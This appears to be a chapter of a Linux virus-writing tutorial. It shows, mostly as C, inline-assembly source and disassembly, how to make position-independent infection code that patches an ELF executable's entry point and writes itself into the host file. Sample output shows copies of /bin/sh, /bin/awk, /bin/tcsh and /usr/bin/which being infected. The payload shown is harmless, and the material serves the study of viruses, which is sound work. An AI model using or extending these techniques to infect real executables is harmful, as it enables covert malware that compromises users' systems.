Unix was not designed to stop people from doing stupid things, because that would also stop them from doing clever things. | |
Doug Gwyn |
In the language of evil I declared the code generated by gcc(1) to be unsuitable for a virus. And then rewrote the whole thing in assembly. A less drastic solution is to use inline assembly to correct only what's really necessary.
Have a look at the disassembly of function write. That code checks the return value of the system call and sets variable errno on error. We don't need this. Actually we can't access global variables at all. And our code does not care for the return code, anyway.
It is also remarkable that the code loads only the four required registers. The sources of glibc make great effort to provide optimal code for every case. I find the macros in glibc-2.2.4/sysdeps/unix/sysv/linux/i386/sysdep.h quite interesting.
For our needs a simple function will do. The line starting with a colon is a constraint. It somehow declares the value that eax has after the asm block to be the value of variable result. The following return statement would load the value of result into eax again, but fortunately gcc(1) optimizes this correctly. Of course the code would work without constraint and return. But the compiler would issue warning "no return statement in function returning non-void".
RedHat's gcc-2.96-98 produces weird code if the assembly statements are grouped in a single asm block. In that case mov ebp,esp is done not on function entry, but after the asm. See All together now for a disassembly. do_syscall is the last part, between second and third ret statement.
Note that we can't name our function plain syscall. There is already such a declaration in unistd.h.
Source - do_syscall.inc.
int do_syscall(int number, ...)
{
int result;
asm("push %ebx; push %esi; push %edi");
asm(
"mov 28(%%ebp),%%edi;"
"mov 24(%%ebp),%%esi;"
"mov 20(%%ebp),%%edx;"
"mov 16(%%ebp),%%ecx;"
"mov 12(%%ebp),%%ebx;"
"mov 8(%%ebp),%%eax;"
"int $0x80"
: "=a" (result)
);
asm("pop %edi; pop %esi; pop %ebx");
return result;
} |
Previous examples required a separate pass to build the insertable code. Output of the first pass is one chunk of bytes. The only interface to the infector is the place to patch with the original entry address (4 bytes at offset 1).
The crucial part are the lines in writeInfection where we pass the address of the chunk of bytes to write(2). In a real virus these lines will also be part of inserted code. The naive approach is to patch these instructions on infection. But this again leads to a two-pass process. The first is required to find the offset of required patches. A more comfortable approach is to make the code position independent by calculating absolute addresses at run-time. Note that gcc(1)'s option -fpic does not help this problem at all.
-fpic
Generate position-independent code (PIC) suitable for use in a shared library, if supported for the target machine. Such code accesses all constant addresses through a global offset table (GOT). The dynamic loader resolves the GOT entries when the program starts (the dynamic loader is not part of GCC; it is part of the operating system). If the GOT size for the linked executable exceeds a machine-specific maximum size, you get an error message from the linker indicating that -fpic does not work; in that case, recompile with -fPIC instead. (These maximums are 16k on the m88k, 8k on the Sparc, and 32k on the m68k and RS/6000. The 386 has no such limit.)
The instruction pointer is a register that holds the address of the next instruction to execute. Unlike "real" registers there is no direct way to retrieve its value. A call pushes the current value of IP onto the stack and adds a relative offset to it. Offset 0 just continues with the following instruction. And if that instruction is a pop we load the the address of the pop instruction itself in a regular register.
We can compare the actual value of IP with the location the linker had in mind when it built the original executable. If the following code is executed at the exact location the linker gave it in the original file, then eax will be exactly the address of label delta after the pop. And the following sub instruction will then set eax to zero.
Source - get_relocate_ofs.inc.
int get_relocate_ofs(void)
{
int result;
__asm__(
"call delta ;"
"delta: "
"pop %%eax ;"
"sub $(delta),%%eax;"
: "=a" (result)
);
return result;
} |
A dump from gdb(1) is not enough to demonstrate this function. I want to show that the last four bytes of the opcode of the call instruction are really zero.
Command - ndisasm.sh.
#!/bin/sh
file=${1:-tmp/doing_it_in_c/three/infector}
func=${2:-get_relocate_ofs}
count=${3:-1}
location=$( \
nm ${file} \
| sed -ne "/^[0-9].*${func}/s/ .*//p" \
| tr a-f A-F \
)
offset=$( echo "ibase=16; ${location} - 08048000" | bc )
ndisasm -e ${offset} -o 0x${location} -U ${file} \
| awk "{ print \$0; }
/ret/ && ++nr >= ${count} { exit 0; }" |
Output - get_relocate_ofs.ndisasm.
08049654 55 push ebp
08049655 E800000000 call 0x804965a
0804965A 58 pop eax
0804965B 2D5A960408 sub eax,0x804965a
08049660 89E5 mov ebp,esp
08049662 5D pop ebp
08049663 C3 ret |
We now have all parts to implement a position independent version of Target::writeInfection. This code works as part of a first stage infector. Output to prove it is at the end of this chapter. It should also work as part of an infection. But do you remember the paragraph in Introduction about "exercise left to the reader"?
Compare this code with the first version. Instead of operating on a single variable, Target::infection, we write every byte between the start of infection and function end. Making sure that certain functions and constant data build a consecutive region requires little more than discipline and dirty tricks.
Source - write_infection.inc.
int do_syscall(int, ...);
#include "infection.inc"
#include "core.inc"
#include "do_syscall.inc"
void end() {}
#include "get_relocate_ofs.inc"
unsigned Target::writeInfection()
{
int ofs = get_relocate_ofs();
char* r_begin = ofs + (char*)&infection;
char* r_end = ofs + (char*)&end;
unsigned size = r_end - r_begin;
/* first byte is the opcode for "push" */
do_syscall(4, fd_dst, r_begin, 1);
/* next four bytes is the address to "ret" to */
do_syscall(4, fd_dst, &original_entry, sizeof(original_entry));
/* rest of infective code */
do_syscall(4, fd_dst, r_begin + 5, size - 5);
return size;
} |
It is very difficult to persuade the linker to arrange object files in a specific order. But by putting all definitions into a single compilation unit (a .c that ends up in a .o) we are quite safe on that front. And though it is nowhere specified, most compilers will write definitions in the order they read them. So the "only" remaining problem is implementation specific classification of definitions. A small test program illustrates the problem.
Source - addr.c.
#include <stdio.h>
void* begin() { return "string literal"; }
static const char constant_a[] = "first try";
static const char constant_b[]
__attribute__ ((section (".text"))) = "second try";
void end() {}
int main()
{
printf("begin = %p\n", &begin);
printf("string literal = %p\n", begin());
printf("constant_a = %p\n", constant_a);
printf("constant_b = %p\n", constant_b);
printf("end = %p\n", &end);
return 0;
} |
Output.
begin = 0x8048460
string literal = 0x8048562
constant_a = 0x8048558
constant_b = 0x804846a
end = 0x8048480 |
Functions are ordered intuitively. However, constant data is put in a separate section called .rodata. And sections are ordered as whole. See the section-to-segment mapping in readelf(1)'s output at Bashful glance.
I see a few approaches to the problem.
Copy the complete code-segment as defined by the ELF header.
Define begin and end for each section to copy.
Put constant data into section .text.
Anyway, the real problem is accessing these bytes in a position independent fashion. For code this is more or less default. call and jmp work with relative offsets. Large contiguous switch blocks could get optimized as a lookup tables, but this is easy to work around. Explicit function pointers can be corrected manually with get_relocate_ofs. The same be could be done with items in virtual method tables. But then the table itself is accessed by compiler-generated code which is hard to correct.
However, every data access requires explicit calculation through get_relocate_ofs. This includes innocent looking string literals. Basically you always have to look at the disassembly of your C code to go sure.
In our trivial example Target::infection holds stub code written in assembler and is never accessed as data. Anyway, here is the documentation of gcc(1) on the issue.
section ("section-name")
Normally, the compiler places the objects it generates in sections like "data" and "bss". Sometimes, however, you need additional sections, or you need certain particular variables to appear in special sections, for example to map to special hardware. The "section" attribute specifies that a variable (or function) lives in a particular section.
This is the link between regular C code and unsuspecting host.
The new entry point is at a constant offset inside inserted code. Preferred value is 0.
The original entry address is patched into the inserted code at a constant offset. Previous examples used 1.
We need a mechanism to activate host code again. Ideally we should leave no trace of our existence, but unmodified registers (especially esp) will suffice.
The code below relies on prober alignment through the compiler. Through an __attribute__ clause the character array Target::infection starts at an address that is a multiple of 16. An assembler directive pads the stub with enough nop instruction to make its size a multiple of 16. Which means that any object placed after the infection is also aligned on a multiple of 16. And 16 is typically the highest possible alignment for i386 compilers.
There is absolutely no reason for compiler or assembler to insert padding bytes between infection and the following function, called core.
Source - infection.asm.
BITS 32
push dword 0 ; replace with original entry address
pushf
pusha
call core
popa
popf
ret
align 16
core: |
Source - infection.inc.
const unsigned char Target::infection[]
__attribute__ (( aligned(16), section(".text") )) =
{
0x68,0x00,0x00,0x00,0x00, /* 00000000: push dword 0x0 */
0x9C, /* 00000005: pushf */
0x60, /* 00000006: pusha */
0xE8,0x04,0x00,0x00,0x00, /* 00000007: call 0x10 */
0x61, /* 0000000C: popa */
0x9D, /* 0000000D: popf */
0xC3, /* 0000000E: ret */
0x90 /* 0000000F: nop */
}; |
If you consider above code too much voodoo, think about the alternative. Functions compiled by gcc(1) are decorated with entry and exit code. The dump at the end of All together now is the next best example. I have no way to suppress that push ebp. And I also don't see how to put code between pop ebp and ret. So we would have to build our own exit code using inline assembly. Basically a pop ebp and some kind of jmp. The exit code generated by gcc(1) would still be there, but just not used. And that still leaves the problem of putting the original entry address somewhere.
The only missing piece is the actual infection core.
Source - build.
void core()
{
do_syscall(4, 1, 0x08048001, 3);
} |
And a disassembly, just to go sure. This is the complete inserted code. It consists of Target::infection, core and do_syscall, in that order.
Output.
08049600 6800000000 push dword 0x0
08049605 9C pushf
08049606 60 pusha
08049607 E804000000 call 0x8049610
0804960C 61 popa
0804960D 9D popf
0804960E C3 ret
0804960F 90 nop
08049610 55 push ebp
08049611 89E5 mov ebp,esp
08049613 83EC08 sub esp,byte +0x8
08049616 6A03 push byte +0x3
08049618 6801800408 push dword 0x8048001
0804961D 6A01 push byte +0x1
0804961F 6A04 push byte +0x4
08049621 E806000000 call 0x804962c
08049626 83C410 add esp,byte +0x10
08049629 C9 leave
0804962A C3 ret
0804962B 90 nop
0804962C 55 push ebp
0804962D 89E5 mov ebp,esp
0804962F 53 push ebx
08049630 56 push esi
08049631 57 push edi
08049632 8B7D1C mov edi,[ebp+0x1c]
08049635 8B7518 mov esi,[ebp+0x18]
08049638 8B5514 mov edx,[ebp+0x14]
0804963B 8B4D10 mov ecx,[ebp+0x10]
0804963E 8B5D0C mov ebx,[ebp+0xc]
08049641 8B4508 mov eax,[ebp+0x8]
08049644 CD80 int 0x80
08049646 5F pop edi
08049647 5E pop esi
08049648 5B pop ebx
08049649 5D pop ebp
0804964A C3 ret |
Output - build.
Infecting copy of /bin/awk... wrote 76 bytes, Ok
Infecting copy of /bin/tcsh... wrote 76 bytes, Ok
Infecting copy of /usr/bin/which... wrote 76 bytes, Ok
Infecting copy of /bin/sh... wrote 76 bytes, Ok |
Output - test.
ELF/home/alba/virus-writing-HOWTO/tmp/doing_it_in_c/three/sh_infected
2.05.8(1)-release
/usr/bin/which
ELF/usr/bin/which
ELFtcsh 6.10.00 (Astron) 2000-11-19 (i386-intel-linux) options 8b,nls,dl,al,kan,rh,color,dspm
ELFGNU Awk 3.1.0
Copyright (C) 1989, 1991-2001 Free Software Foundation. |